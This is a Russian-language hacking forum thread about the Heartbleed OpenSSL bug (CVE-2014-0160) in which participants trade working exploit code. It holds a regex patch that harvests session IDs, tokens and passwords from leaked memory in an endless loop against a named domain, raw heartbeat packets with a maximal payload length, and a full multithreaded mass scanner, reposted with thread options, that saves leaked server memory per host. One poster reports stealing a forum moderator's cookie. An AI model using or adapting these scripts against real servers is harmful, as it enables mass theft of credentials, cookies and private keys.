CVE-2014-0160 OpenSSL 1.0.1* memory leak

[recfrf]

Цитата:

Сообщение от nickcerdito

Нашел вот такой https://gist.github.com/ixs/10116537

можно так поменять например

Код:

 
60 def hexdump(s):
61   r = r"((sid|token|sess|pass|basic|oauth).*)"
62   m = re.findall(r,s)
63   print m
64   sys.exit()

~$ while true; do ./ssltest.py company.com >> result.txt; done

[nickcerdito]

heartbleed masstest, но он однопоточный
https://github.com/musalbas/heartbleed-masstest

[SynQ]

Вообще прелестно.
1) Запилили новую фичу, которая мало кому нужна.
2) Коммит утвердил один человек.
3) Включили ее по дефолту для всех.
4) ???
5) Profit.

[dharrya]

Цитата:

Сообщение от SynQ

Код:

$ python ssltest.py rdot.org
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0301, length = 48
 ... received message: type = 22, ver = 0301, length = 1316
 ... received message: type = 22, ver = 0301, length = 525
 ... received message: type = 22, ver = 0301, length = 4
Sending heartbeat request...
 ... received message: type = 21, ver = 0302, length = 2
Received alert:
  0000: 02 46                                            .F

Server returned error, likely not vulnerable

рдот в безопасности

На самом деле скорее всего был не в безопасности, но этого мы наверное уже не узнаем:-) Просто тест ssltest.py чучуть упрощен (не реагирует на версию отдаваемую сервером) и поэтому случается false negative. Я на его основе вчера писал себе автотест в сканилку, пришлось немного править)

[ont]

Попытался понять из-за чего там ошибка.
Ссылка на патч: http://git.openssl.org/gitweb/?p=ope...diff;h=96db902

Похоже, что сервер, должен отвечать (как и клиент) на запросы вроде пинга. Клиент и сервер обмениваются сообщениями формата:

Код:

[type (1 byte)][length (2 byte)][payload ...n-length bytes...]

Тогда, если серверу отправить запрос, где length=0xffff а payload пустой, то по идее

Код:

1497: memcpy(bp, pl, payload);

должен скопировать в буфер ответа bp данные за пределами короткого запроса-буфера pl

Но не совсем понятен участок хеартбита в эксплоите http://samiux.blogspot.ru/2014/04/ex...2014-0160.html:

Код:

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

[Panic]

Цитата:

Сообщение от ont

Но не совсем понятен участок хеартбита в эксплоите http://samiux.blogspot.ru/2014/04/ex...2014-0160.html:

Код:

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

https://gist.github.com/Daenks/10278379 Тут форк скрипта:

Код:

hb = struct.pack(">BHHBH",
        24,     # TLS package kind - 24 == Heartbeat
        770,    # TLS Version (1.1)
        3,      # Length
        1,      # Heartbeat type (0x01 == Request, 0x02 == Response)
        65535   # Payload length, control how much memory we can snarf on the server side. (exploit here)
    )

[nia]

я так понял бага дергает инфу не для конкретного сайта, а со всех сайтов на айпи.
вчера в результате тестов удалось получить куку модератора форума вбуллетин, вчера же там создали тему про баг, сегодня багу прикрыли, а модер сменил пароль.

[12309]

https://www.cloudflarechallenge.com/heartbleed
у клаудфлейра всё-таки слили их тестовый приватный ключ.
скорее всего это вышло всвязи с ребутом их сервера, но, тем не менее, теперь есть точное доказательство того, что все SSL сертификаты нужно перевыпускать.

[z0mbie]

Код:

#!/usr/bin/env python
import socket, ssl, pprint
import Queue
import pickle
import threading,time,sys,select,struct,urllib,time,re,os
hello_packet = '16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000'.decode('hex')
hb_packet = '1803020003014000'.decode('hex')
def password_parse(the_response):
    the_response_nl= the_response.split(' ')
    #Interesting Paramaters found:
    for each_item in the_response_nl:
        if "=" in each_item or "password" in each_item:
            print each_item


def recv_timeout(the_socket,timeout=2):
    #make socket non blocking
    the_socket.setblocking(0)

    #total data partwise in an array
    total_data=[];
    data='';

    #beginning time
    begin=time.time()
    while 1:
        if total_data and time.time()-begin > timeout:
            break

        elif time.time()-begin > timeout*2:
            break

        try:
            data = the_socket.recv(8192)
            if data:
                total_data.append(data)
                #change the beginning time for measurement
                begin=time.time()
            else:
                #sleep for sometime to indicate a gap
                time.sleep(0.1)
        except:
            pass

    return ''.join(total_data)


def tls(target_addr):

    try:

        server_port =443
        target_addr = target_addr.strip()

        if ":" in target_addr:
            server_port = target_addr.split(":")[1]
            target_addr = target_addr.split(":")[0]

        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sys.stdout.flush()
        print >>sys.stderr, '\n[+]Scanning  server %s' % target_addr , "\n"
        print "##############################################################"
        sys.stdout.flush()
        client_socket .connect((target_addr, int(server_port)))
        #'Sending Hello request...'
        client_socket.send(hello_packet)
        recv_timeout(client_socket,3)
        print 'Sending heartbeat request...'
        client_socket.send(hb_packet)
        data = recv_timeout(client_socket,3)
        if len(data) > 7 :
            print "[-] ",target_addr,' Vulnerable Server ...\n'
            file = open("save.txt", 'a')
            pickle.dump(target_addr, file)
            file.close()
            if os.path.exists(target_addr+".txt"):
                file_write = open(target_addr+".txt", 'a+')
            else:
                file_write = file(target_addr+".txt", "w")
            file_write.write(data)
        else :
            print "[-] ",target_addr,' Not Vulnerable  ...'
    except Exception as e:
        print e,target_addr,server_port



class BinaryGrab(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            url = self.queue.get()
            tls(url)
            #Scan targets here

            #signals to queue job is done
            self.queue.task_done()



start = time.time()

def manyurls(server_addr):
    querange = len(server_addr)
    queue = Queue.Queue()

    #spawn a pool of threads, and pass them queue instance
    for i in range(int(querange)):
        t = BinaryGrab(queue)
        t.setDaemon(True)
        t.start()

    #populate queue with data
    for target in server_addr:

        queue.put(target)

    #wait on the queue until everything has been processed
    queue.join()
if __name__ == "__main__":
    # Kepp all ur targets in scan.txt in the same folder.
    server_addr = []
    print "[+] cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)"
    read_f = open("scan.txt", "r")
    server_addr = read_f.readlines()
    #or provide names here
    #server_addr = ['yahoo.com']
    manyurls(server_addr)

Может ктото переделать скрипт чтобы он чекал к примеру не сразу 3000 из файла а хотябы по 10 штук брал и чекал?

[dharrya]

z0mbie, вот:

Код:

#!/usr/bin/env python
import socket, ssl, pprint
import Queue
import pickle
import threading,time,sys,select,struct,urllib,time,re,os
from optparse import OptionParser

options = OptionParser(usage='%prog [options]', description='cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)')
options.add_option('-f', '--file', type='string', default='scan.txt', help='File with hosts for scan')
options.add_option('-t', '--threads', type='int', default=10, help='Threads count')

hello_packet = '16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000'.decode('hex')
hb_packet = '1803020003014000'.decode('hex')


def password_parse(the_response):
    the_response_nl= the_response.split(' ')
    #Interesting Paramaters found:
    for each_item in the_response_nl:
        if "=" in each_item or "password" in each_item:
            print each_item


def recv_timeout(the_socket,timeout=2):
    #make socket non blocking
    the_socket.setblocking(0)

    #total data partwise in an array
    total_data=[];
    data='';

    #beginning time
    begin=time.time()
    while 1:
        if total_data and time.time()-begin > timeout:
            break

        elif time.time()-begin > timeout*2:
            break

        try:
            data = the_socket.recv(8192)
            if data:
                total_data.append(data)
                #change the beginning time for measurement
                begin=time.time()
            else:
                #sleep for sometime to indicate a gap
                time.sleep(0.1)
        except:
            pass

    return ''.join(total_data)


def tls(target_addr):

    try:

        server_port =443
        target_addr = target_addr.strip()

        if ":" in target_addr:
            server_port = target_addr.split(":")[1]
            target_addr = target_addr.split(":")[0]

        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sys.stdout.flush()
        print >>sys.stderr, '\n[+]Scanning  server %s' % target_addr , "\n"
        print "##############################################################"
        sys.stdout.flush()
        client_socket .connect((target_addr, int(server_port)))
        #'Sending Hello request...'
        client_socket.send(hello_packet)
        recv_timeout(client_socket,3)
        print 'Sending heartbeat request...'
        client_socket.send(hb_packet)
        data = recv_timeout(client_socket,3)
        if len(data) > 7 :
            print "[-] ",target_addr,' Vulnerable Server ...\n'
            save_file = open("save.txt", 'a')
            pickle.dump(target_addr, save_file)
            save_file.close()
            if os.path.exists(target_addr+".txt"):
                file_write = open(target_addr+".txt", 'a+')
            else:
                file_write = file(target_addr+".txt", "w")
            file_write.write(data)
        else :
            print "[-] ",target_addr,' Not Vulnerable  ...'
    except Exception as e:
        print e,target_addr,server_port



class BinaryGrab(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            url = self.queue.get()
            tls(url)
            #Scan targets here

            #signals to queue job is done
            self.queue.task_done()



start = time.time()

def manyurls(server_addr, threads_count):
    queue = Queue.Queue()

    #spawn a pool of threads, and pass them queue instance
    for i in range(threads_count):
        t = BinaryGrab(queue)
        t.setDaemon(True)
        t.start()

    #populate queue with data
    for target in server_addr:
        queue.put(target)

    #wait on the queue until everything has been processed
    queue.join()

    
if __name__ == "__main__":
    opts, args = options.parse_args()
    print "[+] cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)"
    read_f = open(opts.file, "r")
    server_addr = read_f.readlines()
    #or provide names here
    #server_addr = ['yahoo.com']
    manyurls(server_addr, opts.threads)

ключик -t задает кол-во потоков (по умолчанию 10), -f файл со списком сайтов. Но по хорошему скрипт нужно переписывать, как минимум он не учитывает сервера которые не могут работать с TLS 1.1 только 1.0, но все равно уязвимы (я таких встречал, их совсем не много но они есть), им достаточно отправлять heartbeat запрос с указанием правильной версии.